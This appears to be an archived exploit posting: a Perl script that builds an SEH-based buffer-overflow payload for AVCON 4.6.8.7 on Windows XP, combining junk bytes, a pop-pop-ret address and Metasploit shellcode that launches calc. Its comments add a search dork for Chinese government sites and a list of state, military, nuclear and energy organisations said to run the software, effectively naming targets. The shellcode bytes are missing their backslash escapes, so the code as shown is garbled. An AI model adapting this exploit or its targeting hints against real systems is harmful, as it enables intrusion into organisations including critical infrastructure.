Home / os / win7

avcon-overflow.txt

Posted on 07 May 2010

#!/usr/bin/perl

# Exploit Title: AVCON Buffer Overflow
# Date: 5/7/10
# Author: Dillon Beresford
# URL: http://www.avcon.com.cn/
# Version: 4.6.8.7
# Tested on: XP SP2 and SP3
# CVE : NONE
# Code : exploit.pl
# Twitter: http://twitter.com/D1N
# Dork: site:gov.cn "AVCON"

# There are other bugs... This is just for fun ;-)
# Paste the output from exploit.txt into AVH323GW.exe
# Enjoy the wang chung++ and look for the other bugs. ;)

# 2 products from China and 2 0days in one month dizam!

# Okay so who uses AVCON4 and why is it so important?
# China's State Grid
# China's State Information Center
# China's Customs armed police
# China's Shenyang Military Region
# China's Yunnan Frontier Corps
# China's Nuclear Agencies
# China Life Insurance Company
# China Pacific Insurance Group
# China National Petroleum Corporation
# Daqing Oilfield Material Group
# Grace Pai Henan Electric Power
# China Civil Aviation Information Group
# China Southern Airlines Co., Ltd.
# Shenzhen International Trust
# National Grain and Oil Information Center
# Anyang City of Henan Province E
# Guangdong Food and Drug Administration

my $exploit = "poc.txt";
my $junk = "x41" x 1019;
my $nSEH = "xebx06x90x90"; # jmp 6 bytes
my $SEH = pack('V',0x200504B4); # pop pop ret

# windows/exec - 218 bytes
# http://www.metasploit.com
# Encoder: x86/fnstenv_mov
# EXITFUNC=seh, CMD=calc
my $buf =
"x6ax31x59xd9xeexd9x74x24xf4x5bx81x73x13xc4" .
"xd2xe5x7bx83xebxfcxe2xf4x38x3ax6cx7bxc4xd2" .
"x85xf2x21xe3x37x1fx4fx80xd5xf0x96xdex6ex29" .
"xd0x59x97x53xcbx65xafx5dxf5x2dxd4xbbx68xee" .
"x84x07xc6xfexc5xbax0bxdfxe4xbcx26x22xb7x2c" .
"x4fx80xf5xf0x86xeexe4xabx4fx92x9dxfex04xa6" .
"xafx7ax14x82x6ex33xdcx59xbdx5bxc5x01x06x47" .
"x8dx59xd1xf0xc5x04xd4x84xf5x12x49xbax0bxdf" .
"xe4xbcxfcx32x90x8fxc7xafx1dx40xb9xf6x90x99" .
"x9cx59xbdx5fxc5x01x83xf0xc8x99x6ex23xd8xd3" .
"x36xf0xc0x59xe4xabx4dx96xc1x5fx9fx89x84x22" .
"x9ex83x1ax9bx9cx8dxbfxf0xd6x39x63x26xaexd3" .
"x68xfex7dxd2xe5x7bx94xbaxd4xf0xabx55x1axae" .
"x7fx2cxebx49x2exbax43xeex79x4fx1axaexf8xd4" .
"x99x71x44x29x05x0exc1x69xa2x68xb6xbdx8fx7b" .
"x97x2dx30x18xa5xbex86x7b";

my $padding   = "x90" x 5000; # padding
my $payload = $junk.$nSEH.$SEH.$buf.$padding;
open (myfile,">$exploit");
print myfile $payload;
close (myfile);

 

TOP